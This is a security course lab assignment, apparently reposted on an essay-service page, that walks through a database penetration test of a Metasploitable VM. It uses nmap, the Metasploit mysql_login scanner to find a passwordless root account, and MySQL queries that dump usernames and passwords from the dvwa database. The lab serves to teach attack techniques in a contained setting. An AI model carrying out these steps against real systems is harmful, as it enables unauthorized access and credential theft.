Categories
Uncategorized

linux commands

Database Attack LabClass: SEC6070Name:Date:This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps…

Database Attack LabClass: SEC6070Name:Date:This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.1. If Metasploitable isn’t already running launch the Metasploitable VM.2. At the user logon prompt type: msfadmin3. At the password prompt type: msfadmin4. Type: ifconfiga. Paste your screenshot here:-5. Record the IP address here: This is your RHOST or ‘remote host’Now switch to Kali.6. Open a shell by clicking on the black box next to the word “Places”.7. Type: service postgresql starta. Paste your screenshot here:-8. Type: msfconsolea. Paste your screenshot here:-9. Scan your target for database technologies. Try to identify running database services on your target’s ports.a. Type: nmap x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)b. Paste your screenshot here:-Success! We’re identified multiple instances of database technologies running on our target. Let’s choose a service to target. For this example we’ll select MySQL.10. Metasploit has multiple MySQL exploits.a.Type: search mysqlb. Paste your screenshot here:-11. Type: use auxiliary/scanner/mysql/mysql_login12. Type: info13. Type: set rhosts x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)14. Type: set username root15. Type: set stop_on_success true16. Let’s confirm the changes you made took. Type: info17. a. Paste your screenshot here:-18. Type: exploita. Paste your screenshot here:-You determined the username root has no password. Congratulations. Let’s test our access to the MySQL database.19. Open a new shell by clicking on the black box to the right of the word “Places”.20. Type: mysql –h x.x.x.x  –u root (substitute x.x.x.x for the ip address of your REMOTE host)a. Paste your screenshot here:-21. Type: show databases;a. Paste your screenshot here:-22. Let’s pick a database and explore it. Type: use dvwa;a. Paste your screenshot here:-23. Now that we’ve picked a database let’s view the tables. Type: show tables;a. Paste your screenshot here:-24. Let’s see what data is being held in this table. Type: show columns from users;a. Paste your screenshot here:-25. Columns of interest are “user” and “password”. Type: select user, password from users;a. Paste your screenshot here:-26. You’ve successfully scanned for a database technology, found a vulnerable database service running on a target’s port, located the appropriate exploit for use and ran it. Now try exploiting a different database vulnerability, such as Postgresql.Congratulations, you’ve used a Metasploit module to attack a database. You’ve accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.W
 
Are you looking for a similar assignment? Order now for an Amazing Discount! Use Discount Code “Newclient” for a 15% Discount!

linux commands .

 

Leave a Reply

Your email address will not be published. Required fields are marked *